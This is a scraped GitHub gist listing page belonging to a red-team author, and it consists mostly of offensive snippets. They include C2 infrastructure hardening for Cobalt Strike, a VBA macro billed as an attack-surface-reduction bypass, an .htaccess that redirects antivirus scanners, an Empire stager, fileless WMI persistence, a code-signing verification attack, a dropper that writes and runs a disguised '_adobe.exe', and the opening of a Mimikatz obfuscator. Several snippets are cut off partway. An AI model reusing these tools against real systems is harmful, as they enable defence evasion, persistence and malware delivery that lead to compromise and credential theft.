Skip to content

Instantly share code, notes, and snippets.

Rahmat Nurfauzi infosecn1nja

  • Jakarta, Indonesia
Block or report user

Report or block infosecn1nja

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View gist:97b4b2e5132ae9d3d18448b3f7f7aa93
Make a rule that allows port 80/443 access only from redirector:
iptables -A INPUT -p tcp -s <REDIRECTOR_IP> --dport 443 -j ACCEPT
iptables -A INPUT -p tcp --dport 443 -j DROP
iptables -A INPUT -p tcp -s <REDIRECTOR_IP> --dport 80 -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP
Change default port teamserver :
sed -i 's/50050/<PORT>/g' /path/cobaltstrike/teamserver
infosecn1nja / gist:04ab2d8ea15f98880bbf7b70168fa3dd
Last active Aug 12, 2019
APT Group/Red Team Weaponization Phase
View gist:04ab2d8ea15f98880bbf7b70168fa3dd
APT Group/Red Team Weaponization Phase
C2 tools :
- Cobalt Strike
- Empire
- PoshC2
- PupyRAT
- Metasploit
infosecn1nja / ASR Rules Bypass.vba
Last active Dec 17, 2019
ASR rules bypass creating child processes
View ASR Rules Bypass.vba
' ASR rules bypass creating child processes
Sub ASR_blocked()
Dim WSHShell As Object
Set WSHShell = CreateObject("Wscript.Shell")
WSHShell.Run "cmd.exe"
End Sub
infosecn1nja / Inject.cs
Created Jun 19, 2018
DotNetToJScript Build Walkthrough
View Inject.cs
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;
public class TestClass
public TestClass()
infosecn1nja / .htaccess
Created Jun 9, 2018 — forked from curi0usJack/.htaccess
Drop into your apache working directory to instantly redirect most AV crap elsewhere.
View .htaccess
RewriteEngine On
# Uncomment the below line for verbose logging, including seeing which rule matched.
#LogLevel alert rewrite:trace5
# AWS Exclusions. Cloudfronted requests by default will have a UA of "Amazon Cloudfront". More info here:
RewriteCond expr "-R ''" [OR]
RewriteCond expr "-R ''" [OR]
infosecn1nja /
Created Jun 7, 2018
Empire stagers module to generates a squiblytwo and starfighters launcher.
from lib.common import helpers
class Stager:
def __init__(self, mainMenu, params=[]): = {
'Name': 'wmic_xsl_starfighters',
'Author': ['@subTee','@mattifestation','@infosecn1nja','@Cneelis'],
infosecn1nja / WMI-Persistence.ps1
Created May 14, 2018
Fileless WMI Persistence (PSEDWMIEvent_SU - SystemUptime)
View WMI-Persistence.ps1
# Fileless WMI Persistence (PSEDWMIEvent_SU - SystemUptime)
This script creates a persisted WMI event that executes a command upon trigger of the system's uptime being between a given range in seconds. The event will trigger only once.
$EventFilterName = "Fileless WMI Persistence SystemUptime"
View SignatureVerificationAttack.ps1
Get-AuthenticodeSignature -FilePath C:\Demo\bypass_test.psm1
Get-AuthenticodeSignature -FilePath C:\Demo\notepad_backdoored.exe
# Try to execute the script. Add-Type will fail.
Import-Module C:\Demo\bypass_test.psm1
$VerifyHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' +
'\OID\EncodingType 0\CryptSIPDllVerifyIndirectData'
convert2hex=$(xxd -p $1)
result=$(echo $convert2hex | sed s'/ //g')
echo 'Function n(s,c):n=String(s,c):End Function:t=t&"'$result'":Set s=CreateObject("Scripting.FileSystemObject"):p=s.getspecialfolder(2) & "_adobe.exe":Set f=s.CreateTextFile(p,1):for i=1 to len(t) step 2:f.Write Chr(int("&H" & mid(t,i,2))):next:f.Close:WScript.CreateObject("WScript.Shell").run(p)'
if [[ $# -le 1 ]] ; then
echo './ Invoke-Mimikatz.ps1 newfile.ps1'
exit 1
randstr(){< /dev/urandom tr -dc a-zA-Z0-9 | head -c${1:-8};}
cp $1 $2
You can’t perform that action at this time.